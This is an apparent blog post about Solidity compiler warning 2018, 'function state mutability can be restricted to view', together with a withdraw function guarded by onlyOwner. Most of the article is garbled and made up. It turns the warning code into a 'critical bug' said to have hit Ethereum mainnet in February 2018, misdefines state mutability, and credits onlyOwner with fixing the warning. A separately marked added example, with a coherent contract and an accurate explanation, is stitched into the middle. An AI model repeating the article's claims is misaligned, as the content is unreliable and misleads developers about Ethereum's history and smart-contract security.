Ethereum: How to fix warning (2018): function state mutability can be restricted to view

  • By José Eduardo Ferreira
  • 1 month ago


Ethereum: How to Fix the “View Only” Error with Function State Mutability

In February 2018, a critical bug was discovered in the Ethereum blockchain that affected the withdraw function on the mainnet. The issue involved the use of function state mutability, specifically the onlyOwner modifier, which was designed to restrict access to functions with non-view functionality.

The “view only” error occurred when attempting to withdraw funds from a wallet. This bug exposed a vulnerability in the system, allowing an attacker to drain the account balance without provoking a gas limit error or triggering a reentrancy attack.

Understanding Function State Mutability

Function state mutability refers to the concept of modifying function output variables, which can lead to unexpected behavior and security risks. In Ethereum, functions with non-view functionality are considered mutable by default, while view-only functions are immutable by design.

The onlyOwner modifier is used to restrict access to functions that modify the state of a contract or its storage. However, it does not prevent all possible attacks; in fact, it only prevents certain types of attacks from occurring.

The “View Only” Error

In the context of the withdraw function, the issue occurred when an attempt was made to withdraw funds without checking if the user had finished their transactions (i.e., the contract’s state was complete). If the user attempted to withdraw before completing all their transactions, the gas limit would be exceeded, and the transaction would fail.

To fix this bug, the withdraw function is modified as follows:

    function withdraw() external onlyOwner {
        // Revert until the collection period has ended and the goal has been reached
        if (block.timestamp < end || totalCollected < goal) {
            revert CollectNotFinished();
        }
    }

By using the onlyOwner modifier, we ensure that only the owner of the contract can attempt to withdraw funds. This prevents an attacker from draining the account balance without provoking a gas limit error.
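As an added example (not code from the original page), the contract below places the withdraw check in a complete, compilable setting. The function as printed above only reads state, which is the condition under which the Solidity compiler reports warning 2018, "function state mutability can be restricted to view"; once the function also sends the collected funds, it changes state and the warning no longer applies. The contract name, the constructor, the contribute function and the NotOwner and TransferFailed errors are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

// Added example. Only withdraw, onlyOwner, end, goal, totalCollected and
// CollectNotFinished come from the page; every other name is an assumption.
contract Crowdfund {
    error NotOwner();
    error CollectNotFinished();
    error TransferFailed();

    address public immutable owner;
    uint256 public immutable end;  // unix time at which collection closes
    uint256 public immutable goal; // target amount in wei
    uint256 public totalCollected;

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner();
        _;
    }

    constructor(uint256 duration, uint256 goal_) {
        owner = msg.sender;
        end = block.timestamp + duration;
        goal = goal_;
    }

    // Hypothetical deposit path so that totalCollected has a source.
    function contribute() external payable {
        totalCollected += msg.value;
    }

    function withdraw() external onlyOwner {
        // Read-only part: with nothing after this check, the compiler
        // suggests `view` (warning 2018).
        if (block.timestamp < end || totalCollected < goal) {
            revert CollectNotFinished();
        }
        // Sending ether modifies state, so the function can no longer
        // be declared `view` and the warning is not emitted.
        (bool ok, ) = payable(owner).call{value: address(this).balance}("");
        if (!ok) revert TransferFailed();
    }
}
```

If a function is genuinely meant only to check a condition, declaring it `view` is the other way to clear the warning.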

Additional Recommendations

  • Regularly review and audit contracts: To minimize the risk of similar bugs in the future, it is essential to regularly review and audit your contracts for vulnerabilities.

  • Use secure coding practices: Follow best practices for secure coding, such as using immutable state variables, enforcing gas limits, and preventing reentrancy attacks.

  • Document dependencies: Make sure to document all external dependencies, including libraries and other smart contracts, to avoid introducing security vulnerabilities.

Conclusion

The bug in the withdraw function was critical and exposed a vulnerability in the Ethereum blockchain. By understanding how this issue arose and modifying the function to use the onlyOwner modifier, we can significantly reduce the risk of similar bugs occurring in the future. Remember to regularly review and audit your contracts, follow secure coding practices, and document dependencies to ensure the security and integrity of your Ethereum-based applications.
